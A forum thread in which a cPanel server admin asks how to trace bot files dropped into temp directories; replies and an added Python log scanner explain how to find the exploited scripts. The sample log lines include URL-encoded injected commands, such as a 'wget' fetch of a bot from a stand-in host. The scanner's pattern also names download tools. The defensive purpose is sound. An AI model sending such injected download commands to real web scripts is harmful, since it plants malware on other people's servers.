Some "nobody" files "sleep" in my /var/tmp, /tmp, /dev/shm
My server is cPanel + Fedora Core 2. I host around 200 websites on one server, but most of them are inactive.
I have been facing a problem recently. I check /var/tmp, /tmp, /dev/shm every day. I usually see "nobody" files like bot, edddrop, spam files appear in /var/tmp, /tmp, /dev/shm. I think they come from a website with vulnerable scripts.
I am unable to log in to the server all the time to delete them. Does anyone have an idea how to trace where the files come from and fix the website with vulnerable scripts? Do we have any method to protect against it?
Kill the processes if they're running, delete the files, patch Apache if needed, and check the logs to see which script was exploited to download the files. Look in Apache's access_log for "wget" and you'll probably find the command sent to an insecure script.
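The access_log search suggested above, as an added example that is not part of the original reply: a Python scan that URL-decodes each request before matching, so an encoded "wget" is still found, and reports which script received it. It assumes Apache's common/combined log format; the extra tool names (curl, lwp-download) and the temp-directory patterns are assumptions beyond the "wget" named in the reply, and the sample lines are constructed.

```python
import re
import sys
from urllib.parse import unquote_plus

# Common/combined log format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" \d{3}')
# "wget" comes from the thread; curl, lwp-download and the temp
# directories are assumed additions for this example.
SUSPICIOUS = re.compile(r'\b(wget|curl|lwp-download)\b|/var/tmp|/dev/shm|/tmp\b', re.I)

def decode(target):
    """URL-decode repeatedly (bounded) so double-encoded commands are still seen."""
    for _ in range(3):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def find_suspicious(lines):
    """Return (client, time, script path, decoded request) for each matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, when, target = m.groups()
        decoded = decode(target)
        if SUSPICIOUS.search(decoded):
            hits.append((client, when, target.split("?", 1)[0], decoded))
    return hits

# Constructed sample lines (documentation addresses, hypothetical script names).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2005:04:11:52 +0000] "GET /cgi-bin/example.cgi?q=x%3Bwget%20http%3A%2F%2Fexample.invalid%2Fbot HTTP/1.0" 200 512',
    '203.0.113.9 - - [01/Jan/2005:04:12:10 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2005:04:13:01 +0000] "GET /forum/view.php?id=1%253Bcd%2520%252Fvar%252Ftmp HTTP/1.0" 200 90',
    '203.0.113.9 - - [01/Jan/2005:04:14:30 +0000] "GET /widgets/list.php?page=2 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    source = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE
    for client, when, script, decoded in find_suspicious(source):
        print(f"{when}  {client}  script={script}  request={decoded}")
```

Run it with the path to a site's access_log as the only argument; the script column shows which file to patch or remove, and the client and time help match the request to the timestamps of the dropped files.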
You are on cPanel. Check your version of awstats through any site's awstats utility. If yours is outdated, it's possible that your version might be one of the ones that still has the security hole that allows rootkits, IRC bots or other malicious pieces in your var folder.